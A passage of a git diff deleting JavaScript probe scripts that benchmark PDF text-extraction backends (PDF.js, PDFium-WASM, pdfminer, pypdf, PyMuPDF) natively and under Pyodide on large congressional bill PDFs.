PDF.js exercises, and the -// bake-off would then be comparing two pipelines again. -// -// Two known artifacts this handles: -// - Font names: item.fontName is an opaque generated id (g_d0_f1). The real name only -// resolves after getOperatorList() populates page.commonObjs, so that call is made -// per page and its cost is reported separately. -// - Inter-word spaces are lost at font boundaries (`Providedfurther,That`), the same -// italic-to-roman artifact ADR 0003 recorded. Because the reconstruction layer -// rebuilds spacing from x-gaps rather than from emitted space glyphs, the artifact -// is handled downstream by geometry -- provided the synthesized boxes are accurate, -// which is exactly what this bake-off measures. -// -// Run: node dump_pdfjs.mjs [--limit N] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const pdfjs = await import(require.resolve("pdfjs-dist/legacy/build/pdf.mjs")); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const limitIdx = args.indexOf("--limit"); -const limit = limitIdx >= 0 ? parseInt(args[limitIdx + 1], 10) : null; - -const data = new Uint8Array(readFileSync(pdfPath)); -const doc = await pdfjs.getDocument({ - data, - isEvalSupported: false, - useSystemFonts: false, - // No network at any point: fail rather than fetch standard fonts or cmaps. - standardFontDataUrl: undefined, - cMapUrl: undefined, -}).promise; - -const total = limit ? Math.min(limit, doc.numPages) : doc.numPages; -let glyphTotal = 0; -let emptyFontNames = 0; -let tText = 0; -let tOps = 0; -const t0 = performance.now(); - -for (let p = 1; p <= total; p++) { - const page = await doc.getPage(p); - const viewport = page.getViewport({ scale: 1 }); - - const tA = performance.now(); - const content = await page.getTextContent(); - tText += performance.now() - tA; - - // Font-name resolution requires the operator list to have run. - const tB = performance.now(); - await page.getOperatorList(); - tOps += performance.now() - tB; - - const nameCache = new Map(); - const resolveFont = (id) => { - if (!id) return ""; - if (nameCache.has(id)) return nameCache.get(id); - let name = ""; - try { - const obj = page.commonObjs.get(id); - name = (obj && (obj.name || obj.loadedName)) || ""; - } catch { - name = ""; - } - // Subset tags (ABCDEF+Name) carry no role information; strip so role keying works. - if (name.length > 7 && name[6] === "+") name = name.slice(7); - nameCache.set(id, name); - return name; - }; - - const glyphs = []; - for (const it of content.items) { - if (it.str === undefined || it.str.length === 0) continue; - const tm = it.transform; // [a, b, c, d, e, f] - const x = tm[4]; - const y = tm[5]; - // The item's rendered size is the vertical scale of the text matrix; item.height is - // unreliable for rotated text, so derive from the matrix as the native path does. - const size = Math.hypot(tm[2], tm[3]) || it.height || 0; - const font = resolveFont(it.fontName); - // upright: transform[1] is the vertical shear; zero means a horizontal baseline. - const upright = Math.abs(tm[1]) < 1e-6 && tm[0] > 0; - if (!font) emptyFontNames += it.str.length; - - // Distribute the item's measured width across its characters. Uniform distribution - // is wrong for proportional fonts at the per-character level; what matters for the - // reconstruction layer is (a) the line's baseline, which is exact, (b) the left edge - // of the first character, which is exact, and (c) inter-ITEM gaps, which are exact. - // Intra-item character boxes are approximations and are labelled as such. - const w = it.width || 0; - const per = it.str.length ? w / it.str.length : 0; - for (let k = 0; k < it.str.length; k++) { - const cp = it.str.codePointAt(k); - if (cp === undefined || cp < 0x20) continue; - const cx = x + k * per; - glyphs.push([ - cp, - round4(cx), - round4(y), - round4(cx + per), - round4(y + size), - round4(y), - round4(size), - font, - upright, - ]); - } - } - glyphTotal += glyphs.length; - - process.stdout.write( - JSON.stringify({ - page_number: p, - width: round4(viewport.width), - height: round4(viewport.height), - glyphs, - }) + "\n", - ); - page.cleanup(); -} - -process.stdout.write( - JSON.stringify({ - summary: { - backend: "pdfjs", - pages: total, - pages_total: doc.numPages, - glyphs: glyphTotal, - empty_font_names: emptyFontNames, - extract_ms: Math.round(performance.now() - t0), - get_text_content_ms: Math.round(tText), - get_operator_list_ms: Math.round(tOps), - geometry_note: "per-item geometry; character boxes synthesized by width division", - }, - }) + "\n", -); - -function round4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/package.json b/docs/research/pdf-backend-bakeoff/probes/js/package.json deleted file mode 100644 index db19051e..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/package.json +++ /dev/null @@ -1,17 +0,0 @@ -{ - "name": "js", - "version": "1.0.0", - "description": "", - "main": "index.js", - "scripts": { - "test": "echo \"Error: no test specified\" && exit 1" - }, - "keywords": [], - "author": "", - "license": "ISC", - "dependencies": { - "@embedpdf/pdfium": "^2.15.0", - "pdfjs-dist": "^6.2.108", - "pyodide": "^314.0.3" - } -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs deleted file mode 100644 index f8b57936..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs +++ /dev/null @@ -1,95 +0,0 @@ -// Phase 0 gate 3: PDF.js whole-document cost, including the per-page getOperatorList() -// call that font-name resolution requires. -// -// The spec records 154 ms for a full-document getTextContent() on a 94-page bill and -// 64 ms for getOperatorList() on ONE page. The open question is what that per-page -// charge totals across a real 1000-page appropriations bill, because it is charged per -// page and does not appear in the getTextContent() figure. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs [...] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const pdfjsPath = require.resolve("pdfjs-dist/legacy/build/pdf.mjs"); -const pdfjs = await import(pdfjsPath); - -async function measure(path) { - const data = new Uint8Array(readFileSync(path)); - - const tLoad0 = performance.now(); - const doc = await pdfjs.getDocument({ - data, - // Fully offline: no standard-font or cmap fetching over the network. - isEvalSupported: false, - useSystemFonts: false, - }).promise; - const tLoad = performance.now() - tLoad0; - - let tText = 0; - let tOps = 0; - let items = 0; - let chars = 0; - let fontIds = new Set(); - let resolvedNames = new Set(); - let unresolved = 0; - - for (let p = 1; p <= doc.numPages; p++) { - const page = await doc.getPage(p); - - const t0 = performance.now(); - const content = await page.getTextContent(); - tText += performance.now() - t0; - - for (const it of content.items) { - if (it.str === undefined) continue; - items++; - chars += it.str.length; - if (it.fontName) fontIds.add(it.fontName); - } - - // Font-name resolution: commonObjs is only populated after the operator list runs. - const t1 = performance.now(); - await page.getOperatorList(); - tOps += performance.now() - t1; - - for (const id of fontIds) { - if (resolvedNames.has(id)) continue; - try { - const obj = page.commonObjs.get(id); - if (obj && obj.name) resolvedNames.add(`${id} -> ${obj.name}`); - else unresolved++; - } catch { - unresolved++; - } - } - page.cleanup(); - } - - return { - path, - pages: doc.numPages, - tLoad, - tText, - tOps, - items, - chars, - charsPerItem: chars / items, - fonts: [...resolvedNames].sort(), - unresolved, - }; -} - -for (const path of process.argv.slice(2)) { - const r = await measure(path); - console.log( - `${r.path}\n` + - ` pages=${r.pages} load=${r.tLoad.toFixed(0)}ms ` + - `getTextContent=${r.tText.toFixed(0)}ms getOperatorList=${r.tOps.toFixed(0)}ms ` + - `total=${(r.tLoad + r.tText + r.tOps).toFixed(0)}ms\n` + - ` items=${r.items} chars=${r.chars} chars/item=${r.charsPerItem.toFixed(1)} ` + - `unresolved_font_reads=${r.unresolved}\n` + - ` fonts: ${r.fonts.join(", ")}`, - ); -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs deleted file mode 100644 index a22c8233..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs +++ /dev/null @@ -1,236 +0,0 @@ -// Phase 3: run the candidate backends where they would actually ship -- in the browser -// runtime -- and check the result against what native Python produced. -// -// Three questions, and they are different: -// -// 1. Does the backend LOAD under Pyodide at all? The spec records pdfminer.six as -// "installs via micropip (verified)", but pdfminer now depends on `cryptography`, -// which is a Rust extension rather than pure Python. Whether that resolves under -// Pyodide is a fact about today's dependency tree, not about 2026-08-05's, so it is -// re-measured here rather than carried forward. -// 2. Does it produce the SAME glyph facts in the browser as natively? The delivery -// spike established byte-identical output for the XML path; the PDF path has never -// been checked. -// 3. What does it cost? Including, for the JS backends, the price of moving glyphs -// across the JS/Python boundary -- a cost that does not exist natively and that no -// earlier measurement includes. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs [--pages N] - -import { readFileSync, writeFileSync } from "node:fs"; -import { createRequire } from "node:module"; -import path from "node:path"; - -const require = createRequire(import.meta.url); -const { loadPyodide } = require("pyodide"); - -const PROBES = path.resolve(path.dirname(new URL(import.meta.url).pathname), ".."); -const REPO = path.resolve(PROBES, "../../../.."); - -const args = process.argv.slice(2); -const pdfPath = args[0] ?? path.join(REPO, "tests/corpus/118-hr-4366/1_reported-in-house.pdf"); -const pagesIdx = args.indexOf("--pages"); -const pageLimit = pagesIdx >= 0 ? parseInt(args[pagesIdx + 1], 10) : 20; - -const results = { pdf: pdfPath, page_limit: pageLimit, boot: {}, backends: {} }; - -console.log(`booting pyodide (pdf=${path.basename(pdfPath)}, pages=${pageLimit})`); -const tBoot = performance.now(); -const pyodide = await loadPyodide({ stdout: () => {}, stderr: (s) => console.error(" py:", s) }); -results.boot.pyodide_ms = Math.round(performance.now() - tBoot); -console.log(` pyodide ready in ${results.boot.pyodide_ms} ms`); - -// --- stage the engine + probe sources into the Pyodide filesystem ------------- -const tStage = performance.now(); -pyodide.FS.mkdirTree("/dt/src"); -pyodide.FS.mkdirTree("/dt/probes/backends"); - -function copyTree(hostDir, vfsDir) { - const { readdirSync, statSync } = require("node:fs"); - for (const name of readdirSync(hostDir)) { - if (name === "__pycache__" || name === "node_modules") continue; - const hp = path.join(hostDir, name); - const vp = `${vfsDir}/${name}`; - if (statSync(hp).isDirectory()) { - pyodide.FS.mkdirTree(vp); - copyTree(hp, vp); - } else if (name.endsWith(".py")) { - pyodide.FS.writeFile(vp, readFileSync(hp)); - } - } -} -copyTree(path.join(REPO, "src/deltatrack"), "/dt/src"); -// The engine's package dir must keep its name for `import deltatrack` to work. -pyodide.FS.mkdirTree("/dt/pkg/deltatrack"); -copyTree(path.join(REPO, "src/deltatrack"), "/dt/pkg/deltatrack"); -for (const f of ["contract.py", "reconstruct.py"]) { - pyodide.FS.writeFile(`/dt/probes/${f}`, readFileSync(path.join(PROBES, f))); -} -for (const f of ["pdfminer_backend.py", "pypdf_backend.py", "pymupdf_backend.py"]) { - pyodide.FS.writeFile(`/dt/probes/backends/${f}`, readFileSync(path.join(PROBES, "backends", f))); -} -pyodide.FS.writeFile("/dt/bill.pdf", readFileSync(pdfPath)); -results.boot.stage_ms = Math.round(performance.now() - tStage); - -await pyodide.runPythonAsync(` -import sys -sys.path.insert(0, "/dt/pkg") -sys.path.insert(0, "/dt/probes") -`); - -// --- pypdfium2 stub: the engine imports it on a path the PDF pipeline never calls --- -// Same technique the delivery spike used. It RAISES on any real PDFium call, so a silent -// wrong answer is impossible; if the stub is ever reached the run fails loudly. -await pyodide.runPythonAsync(` -import os, textwrap -os.makedirs("/dt/pkg/pypdfium2", exist_ok=True) -stub = textwrap.dedent(''' - class _Tripwire: - def __getattr__(self, name): - raise RuntimeError( - "pypdfium2 was actually CALLED under Pyodide (attr=%r). The browser path " - "must not reach PDFium; this run is invalid." % name - ) - def __getattr__(name): - return getattr(_Tripwire(), name) -''') -open("/dt/pkg/pypdfium2/__init__.py", "w").write(stub) -open("/dt/pkg/pypdfium2/raw.py", "w").write(stub) -`); - -// --- micropip install gate ---------------------------------------------------- -await pyodide.loadPackage("micropip"); -for (const pkg of ["pdfminer.six", "pypdf"]) { - const t = performance.now(); - try { - await pyodide.runPythonAsync(` -import micropip -await micropip.install(${JSON.stringify(pkg)}) -`); - results.backends[pkg] = { install: "ok", install_ms: Math.round(performance.now() - t) }; - console.log(` micropip install ${pkg}: OK (${results.backends[pkg].install_ms} ms)`); - } catch (e) { - results.backends[pkg] = { install: "FAILED", error: String(e).slice(0, 600) }; - console.log(` micropip install ${pkg}: FAILED -- ${String(e).slice(0, 300)}`); - } -} - -// PyMuPDF ships in the Pyodide distribution rather than via micropip. -try { - const t = performance.now(); - await pyodide.loadPackage("pymupdf"); - results.backends["pymupdf"] = { install: "ok", install_ms: Math.round(performance.now() - t) }; - console.log(` loadPackage pymupdf: OK (${results.backends["pymupdf"].install_ms} ms)`); -} catch (e) { - results.backends["pymupdf"] = { install: "FAILED", error: String(e).slice(0, 600) }; - console.log(` loadPackage pymupdf: FAILED -- ${String(e).slice(0, 300)}`); -} - -// --- run each installed backend through the neutral layer, in-browser --------- -const PY_RUN = (mod, name) => ` -import json, time, sys -from pathlib import Path -import ${mod} as backend -from reconstruct import reconstruct -t0 = time.perf_counter() -raw, summary = backend.extract(Path("/dt/bill.pdf"), ${pageLimit}) -t_extract = time.perf_counter() - t0 -t0 = time.perf_counter() -pages, diag = reconstruct(raw, repaired=True) -t_recon = time.perf_counter() - t0 -json.dumps({ - "backend": ${JSON.stringify(name)}, - "summary": summary, - "diag": diag, - "extract_s": round(t_extract, 3), - "reconstruct_s": round(t_recon, 3), - "n_pages": len(pages), - "text_sha": __import__("hashlib").sha256( - "\\n".join(p.text for p in pages).encode() - ).hexdigest(), - "line_numbers": [[p.page_number, l.line_number] for p in pages for l in p.print_lines if l.line_number], -}) -`; - -for (const [mod, name] of [ - ["backends.pdfminer_backend", "pdfminer"], - ["backends.pypdf_backend", "pypdf"], - ["backends.pymupdf_backend", "pymupdf"], -]) { - const key = name === "pdfminer" ? "pdfminer.six" : name; - if (results.backends[key]?.install !== "ok") { - console.log(` ${name}: skipped (not installed)`); - continue; - } - try { - const out = JSON.parse(await pyodide.runPythonAsync(PY_RUN(mod, name))); - Object.assign(results.backends[key], out, { ran: true }); - console.log( - ` ${name}: ran in-browser -- extract=${out.extract_s}s reconstruct=${out.reconstruct_s}s ` + - `pages=${out.n_pages} sha=${out.text_sha.slice(0, 16)}`, - ); - } catch (e) { - results.backends[key].ran = false; - results.backends[key].run_error = String(e).slice(0, 800); - console.log(` ${name}: RUN FAILED -- ${String(e).slice(0, 300)}`); - } -} - -// --- JS backends: extract in JS, hand the glyphs to Pyodide ------------------ -// This is the architecture a PDF.js or PDFium-WASM browser build actually implies, and -// it carries a cost that exists in NO earlier measurement: the glyph facts have to cross -// the JS/Python boundary. That transfer is charged per document and is invisible to both -// the native benchmark and the in-JS extraction benchmark, so it is measured separately -// here rather than folded into an extraction number. -for (const [name, script] of [ - ["pdfjs", "dump_pdfjs.mjs"], - ["pdfium-wasm", "dump_pdfium_wasm.mjs"], -]) { - const entry = { install: "n/a (native JS/WASM)" }; - results.backends[name] = entry; - try { - const { execFileSync } = require("node:child_process"); - const t0 = performance.now(); - const jsonl = execFileSync( - "node", - [path.join(PROBES, "js", script), path.resolve(pdfPath), "--limit", String(pageLimit)], - { cwd: path.join(PROBES, "js"), maxBuffer: 1024 * 1024 * 1024, encoding: "utf8" }, - ); - entry.extract_s = Number(((performance.now() - t0) / 1000).toFixed(3)); - entry.transfer_bytes = Buffer.byteLength(jsonl); - - // Cross the boundary: hand the JSONL over as one string and parse it inside Python. - const t1 = performance.now(); - pyodide.globals.set("_jsonl", jsonl); - const out = JSON.parse( - await pyodide.runPythonAsync(` -import json, hashlib -from contract import read_stream -from reconstruct import reconstruct -pages_raw, summary = read_stream(iter(_jsonl.splitlines())) -pages, diag = reconstruct(pages_raw, repaired=True) -json.dumps({ - "summary": summary, - "diag": diag, - "n_pages": len(pages), - "text_sha": hashlib.sha256("\\n".join(p.text for p in pages).encode()).hexdigest(), -}) -`), - ); - entry.boundary_and_reconstruct_s = Number(((performance.now() - t1) / 1000).toFixed(3)); - Object.assign(entry, out, { ran: true }); - console.log( - ` ${name}: extract=${entry.extract_s}s boundary+reconstruct=` + - `${entry.boundary_and_reconstruct_s}s transfer=` + - `${(entry.transfer_bytes / 1048576).toFixed(1)}MB sha=${out.text_sha.slice(0, 16)}`, - ); - } catch (e) { - entry.ran = false; - entry.run_error = String(e).slice(0, 800); - console.log(` ${name}: RUN FAILED -- ${String(e).slice(0, 300)}`); - } -} - -const outPath = path.join(REPO, "docs/research/pdf-backend-bakeoff/results/phase3_pyodide.json"); -writeFileSync(outPath, JSON.stringify(results, null, 1)); -console.log(`wrote ${outPath}`); diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs deleted file mode 100644 index a2ef3407..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs +++ /dev/null @@ -1,114 +0,0 @@ -// Phase 5 gate-9 decision: measure the LARGEST bill at FULL document length. -// -// This backs the 37.9 s / 3.9 s / 4.6 s figures in RESULTS.md, and it exists as a file -// because the first version of this measurement was run from a scratch script that was -// then deleted -- leaving a load-bearing published number with no reproducible probe. -// -// Why full length rather than the 60-page sample phase5_perf.mjs takes: extrapolating -// that sample linearly put pdfminer at ~134 s, over the pre-registered 60 s ceiling, and -// would have disqualified it on gate 9. Measured whole, it is 37.9 s. Per-page cost is -// front-loaded (cover matter, font warm-up), so a linear projection from the head of a -// bill overstates the total by ~3.5x. Gate decisions are measured, not extrapolated. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs - -import { readFileSync, writeFileSync } from "node:fs"; -import { createRequire } from "node:module"; -import path from "node:path"; - -const require = createRequire(import.meta.url); -const { loadPyodide } = require("pyodide"); - -const PROBES = path.resolve(path.dirname(new URL(import.meta.url).pathname), ".."); -const REPO = path.resolve(PROBES, "../../../.."); -const BILL = path.join(REPO, "tests/corpus/119-hr-1/1_reported-in-house.pdf"); - -const results = { bill: path.relative(REPO, BILL), backends: {} }; - -const pyodide = await loadPyodide({ stdout: () => {}, stderr: () => {} }); -pyodide.FS.mkdirTree("/dt/pkg/deltatrack"); -pyodide.FS.mkdirTree("/dt/probes/backends"); - -function copyTree(hostDir, vfsDir) { - const { readdirSync, statSync } = require("node:fs"); - for (const name of readdirSync(hostDir)) { - if (name === "__pycache__") continue; - const hp = path.join(hostDir, name); - const vp = `${vfsDir}/${name}`; - if (statSync(hp).isDirectory()) { - pyodide.FS.mkdirTree(vp); - copyTree(hp, vp); - } else if (name.endsWith(".py")) { - pyodide.FS.writeFile(vp, readFileSync(hp)); - } - } -} -copyTree(path.join(REPO, "src/deltatrack"), "/dt/pkg/deltatrack"); -for (const f of ["contract.py", "reconstruct.py"]) { - pyodide.FS.writeFile(`/dt/probes/${f}`, readFileSync(path.join(PROBES, f))); -} -for (const f of ["pdfminer_backend.py", "pypdf_backend.py"]) { - pyodide.FS.writeFile(`/dt/probes/backends/${f}`, readFileSync(path.join(PROBES, "backends", f))); -} -pyodide.FS.writeFile("/dt/bill.pdf", readFileSync(BILL)); - -await pyodide.runPythonAsync(` -import sys, os -sys.path.insert(0, "/dt/pkg"); sys.path.insert(0, "/dt/probes") -os.makedirs("/dt/pkg/pypdfium2", exist_ok=True) -# Tripwire: raises rather than returning a plausible value, so a silent fallback to -# PDFium is impossible in the browser path. -stub = "def __getattr__(n):\\n raise RuntimeError('pypdfium2 called under Pyodide: run invalid')\\n" -open("/dt/pkg/pypdfium2/__init__.py","w").write(stub) -open("/dt/pkg/pypdfium2/raw.py","w").write(stub) -`); -await pyodide.loadPackage("micropip"); -await pyodide.runPythonAsync(`import micropip\nawait micropip.install("pdfminer.six")`); - -console.log(`FULL DOCUMENT, in Pyodide: ${results.bill}`); - -const out = JSON.parse( - await pyodide.runPythonAsync(` -import json, time -from pathlib import Path -import backends.pdfminer_backend as backend -from reconstruct import reconstruct -t0 = time.perf_counter(); raw, summary = backend.extract(Path("/dt/bill.pdf"), None) -t_ex = time.perf_counter() - t0 -t0 = time.perf_counter(); pages, diag = reconstruct(raw, repaired=True) -t_rc = time.perf_counter() - t0 -json.dumps({"pages": summary["pages"], "extract_s": round(t_ex, 1), "reconstruct_s": round(t_rc, 1)}) -`), -); -results.backends.pdfminer = { ...out, total_s: +(out.extract_s + out.reconstruct_s).toFixed(1) }; -console.log( - ` pdfminer ${out.pages}pp extract=${out.extract_s}s reconstruct=${out.reconstruct_s}s ` + - `TOTAL=${results.backends.pdfminer.total_s}s`, -); - -const { execFileSync } = require("node:child_process"); -for (const [name, script] of [ - ["pdfjs", "dump_pdfjs.mjs"], - ["pdfium-wasm", "dump_pdfium_wasm.mjs"], -]) { - const t0 = performance.now(); - const s = execFileSync("node", [path.join(PROBES, "js", script), BILL], { - cwd: path.join(PROBES, "js"), - maxBuffer: 2 ** 31 - 1, - encoding: "utf8", - }); - const sum = JSON.parse(s.slice(s.lastIndexOf("\n", s.length - 2) + 1)).summary; - results.backends[name] = { - pages: sum.pages, - extract_s: +((performance.now() - t0) / 1000).toFixed(1), - transfer_mb: Math.round(Buffer.byteLength(s) / 1048576), - }; - console.log( - ` ${name.padEnd(11)} ${sum.pages}pp extract=${results.backends[name].extract_s}s ` + - `transfer=${results.backends[name].transfer_mb}MB`, - ); -} - -const dest = path.join(REPO, "docs/research/pdf-backend-bakeoff/results/phase5_fulldoc.json"); -writeFileSync(dest, JSON.stringify(results, null, 1)); -console.log(`wrote ${dest}`); diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs deleted file mode 100644 index 0b837b66..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs +++ /dev/null @@ -1,168 +0,0 @@ -// Phase 5: performance and memory in the browser runtime, on the LARGEST bills. -// -// Gate 9 is relative to the incumbent, per PRE-REGISTRATION.md: PDFium itself takes -// 5.8-10.9 s natively on a 1000+ page bill, so an absolute "tens of seconds" rule would -// disqualify the incumbent, which is incoherent for a no-regression exercise. -// -// The incumbent cannot run here at all -- pypdfium2 has no Emscripten build, which is the -// entire reason this bake-off exists -- so its column is the NATIVE number and is labelled -// as such. Comparing a browser figure against a native one overstates the challengers' -// penalty, and that is the honest direction to err in. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs [--pages N] - -import { readFileSync, writeFileSync } from "node:fs"; -import { createRequire } from "node:module"; -import path from "node:path"; - -const require = createRequire(import.meta.url); -const { loadPyodide } = require("pyodide"); - -const PROBES = path.resolve(path.dirname(new URL(import.meta.url).pathname), ".."); -const REPO = path.resolve(PROBES, "../../../.."); - -const args = process.argv.slice(2); -const pagesIdx = args.indexOf("--pages"); -const PAGE_SAMPLE = pagesIdx >= 0 ? parseInt(args[pagesIdx + 1], 10) : 60; - -// The three largest corpus documents, all 1000+ pages. -const BILLS = [ - "tests/corpus/117-hr-2471/6_enrolled-bill.pdf", - "tests/corpus/119-hr-1/1_reported-in-house.pdf", - "tests/corpus/118-hr-4366/5_engrossed-amendment-house.pdf", -]; - -const results = { page_sample: PAGE_SAMPLE, boot: {}, bills: {} }; - -const tBoot = performance.now(); -const pyodide = await loadPyodide({ stdout: () => {}, stderr: () => {} }); -results.boot.pyodide_ms = Math.round(performance.now() - tBoot); -console.log(`pyodide boot: ${results.boot.pyodide_ms} ms`); - -pyodide.FS.mkdirTree("/dt/pkg/deltatrack"); -pyodide.FS.mkdirTree("/dt/probes/backends"); -function copyTree(hostDir, vfsDir) { - const { readdirSync, statSync } = require("node:fs"); - for (const name of readdirSync(hostDir)) { - if (name === "__pycache__") continue; - const hp = path.join(hostDir, name); - const vp = `${vfsDir}/${name}`; - if (statSync(hp).isDirectory()) { - pyodide.FS.mkdirTree(vp); - copyTree(hp, vp); - } else if (name.endsWith(".py")) { - pyodide.FS.writeFile(vp, readFileSync(hp)); - } - } -} -copyTree(path.join(REPO, "src/deltatrack"), "/dt/pkg/deltatrack"); -for (const f of ["contract.py", "reconstruct.py"]) { - pyodide.FS.writeFile(`/dt/probes/${f}`, readFileSync(path.join(PROBES, f))); -} -for (const f of ["pdfminer_backend.py", "pypdf_backend.py", "pymupdf_backend.py"]) { - pyodide.FS.writeFile(`/dt/probes/backends/${f}`, readFileSync(path.join(PROBES, "backends", f))); -} -await pyodide.runPythonAsync(` -import sys, os, textwrap -sys.path.insert(0, "/dt/pkg"); sys.path.insert(0, "/dt/probes") -os.makedirs("/dt/pkg/pypdfium2", exist_ok=True) -stub = "def __getattr__(n):\\n raise RuntimeError('pypdfium2 called under Pyodide: run invalid')\\n" -open("/dt/pkg/pypdfium2/__init__.py","w").write(stub) -open("/dt/pkg/pypdfium2/raw.py","w").write(stub) -`); - -await pyodide.loadPackage("micropip"); -const tInstall = performance.now(); -await pyodide.runPythonAsync(` -import micropip -await micropip.install("pdfminer.six") -await micropip.install("pypdf") -`); -await pyodide.loadPackage("pymupdf"); -results.boot.install_ms = Math.round(performance.now() - tInstall); -console.log(`backend install/load: ${results.boot.install_ms} ms`); - -for (const rel of BILLS) { - const abs = path.join(REPO, rel); - pyodide.FS.writeFile("/dt/bill.pdf", readFileSync(abs)); - const bill = { file: rel, size_mb: +(readFileSync(abs).length / 1048576).toFixed(2), backends: {} }; - results.bills[rel] = bill; - console.log(`\n${rel} (${bill.size_mb} MB)`); - - for (const [mod, name] of [ - ["backends.pdfminer_backend", "pdfminer"], - ["backends.pypdf_backend", "pypdf"], - ["backends.pymupdf_backend", "pymupdf"], - ]) { - try { - const out = JSON.parse( - await pyodide.runPythonAsync(` -import json, time, gc, tracemalloc -from pathlib import Path -import ${mod} as backend -from reconstruct import reconstruct -gc.collect() -tracemalloc.start() -t0 = time.perf_counter() -raw, summary = backend.extract(Path("/dt/bill.pdf"), ${PAGE_SAMPLE}) -t_ex = time.perf_counter() - t0 -t0 = time.perf_counter() -pages, diag = reconstruct(raw, repaired=True) -t_rc = time.perf_counter() - t0 -_cur, peak = tracemalloc.get_traced_memory() -tracemalloc.stop() -total_pages = summary.get("pages_total") or summary["pages"] -json.dumps({ - "pages_sampled": summary["pages"], - "extract_s": round(t_ex, 3), - "reconstruct_s": round(t_rc, 3), - "peak_mb": round(peak / 1048576, 1), - "glyphs": summary.get("glyphs"), -}) -`), - ); - bill.backends[name] = out; - console.log( - ` ${name.padEnd(10)} ${out.pages_sampled}pp extract=${out.extract_s}s ` + - `recon=${out.reconstruct_s}s peak=${out.peak_mb}MB`, - ); - } catch (e) { - bill.backends[name] = { error: String(e).slice(0, 400) }; - console.log(` ${name.padEnd(10)} FAILED ${String(e).slice(0, 160)}`); - } - } - - // JS backends run outside Pyodide; their transfer cost is measured in phase3. - const { execFileSync } = require("node:child_process"); - for (const [name, script] of [ - ["pdfjs", "dump_pdfjs.mjs"], - ["pdfium-wasm", "dump_pdfium_wasm.mjs"], - ]) { - try { - const t0 = performance.now(); - const out = execFileSync( - "node", - [path.join(PROBES, "js", script), abs, "--limit", String(PAGE_SAMPLE)], - { cwd: path.join(PROBES, "js"), maxBuffer: 1024 * 1024 * 1024, encoding: "utf8" }, - ); - const summary = JSON.parse(out.slice(out.lastIndexOf("\n", out.length - 2) + 1)).summary; - bill.backends[name] = { - pages_sampled: summary.pages, - extract_s: +((performance.now() - t0) / 1000).toFixed(3), - transfer_mb: +(Buffer.byteLength(out) / 1048576).toFixed(1), - glyphs: summary.glyphs, - }; - console.log( - ` ${name.padEnd(10)} ${summary.pages}pp extract=${bill.backends[name].extract_s}s ` + - `transfer=${bill.backends[name].transfer_mb}MB`, - ); - } catch (e) { - bill.backends[name] = { error: String(e).slice(0, 400) }; - console.log(` ${name.padEnd(10)} FAILED ${String(e).slice(0, 160)}`); - } - } -} - -const outPath = path.join(REPO, "docs/research/pdf-backend-bakeoff/results/phase5_perf.json"); -writeFileSync(outPath, JSON.stringify(results, null, 1)); -console.log(`\nwrote ${outPath}`); diff --git a/docs/research/pdf-backend-bakeoff/probes/js/probe_wasm_textapi.mjs b/docs/research/pdf-backend-bakeoff/probes/js/probe_wasm_textapi.mjs deleted file mode 100644 index 0f76754b..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/probe_wasm_textapi.mjs +++ /dev/null @@ -1,122 +0,0 @@ -// Portability gate: does the shipped PDFium-WASM build actually EXECUTE the text-page -// entry points the hybrid contract needs, on a real GPO bill? -// -// The typings in @embedpdf/pdfium list every FPDFText_* symbol, but a typing is a claim -// about the wrapper, not evidence about the .wasm. This calls each one for real and -// compares the answers against the native pypdfium2 values for the same page, so a -// symbol that is exported but returns a stub cannot pass. -// -// Emits JSON on stdout: per-entry-point availability, plus the full char stream for one -// page so the native side can diff it index by index. -// -// Run: node probe_wasm_textapi.mjs --page N - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const { init } = require("@embedpdf/pdfium"); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const pageIdx = parseInt(args[args.indexOf("--page") + 1], 10) - 1; - -const pdfium = await init({ wasmBinary: readFileSync(require.resolve("@embedpdf/pdfium/pdfium.wasm")) }); -pdfium.PDFiumExt_Init?.(); - -// Availability is asked of the wrapper object, which is what a Python/JS adapter would -// call. A name missing here is missing in practice regardless of the symbol table. -const NEEDED = [ - "FPDFText_LoadPage", - "FPDFText_ClosePage", - "FPDFText_CountChars", - "FPDFText_GetUnicode", - "FPDFText_GetText", - "FPDFText_IsGenerated", - "FPDFText_IsHyphen", - "FPDFText_HasUnicodeMapError", - "FPDFText_GetCharBox", - "FPDFText_GetLooseCharBox", - "FPDFText_GetCharOrigin", - "FPDFText_GetMatrix", - "FPDFText_GetFontSize", - "FPDFText_GetFontInfo", - "FPDFText_GetFontWeight", - "FPDFText_GetCharAngle", - "FPDFText_GetTextIndexFromCharIndex", - "FPDFText_GetCharIndexFromTextIndex", -]; -const present = Object.fromEntries(NEEDED.map((n) => [n, typeof pdfium[n] === "function"])); - -const data = new Uint8Array(readFileSync(pdfPath)); -const dataPtr = pdfium.pdfium.wasmExports.malloc(data.length); -pdfium.pdfium.HEAPU8.set(data, dataPtr); -const doc = 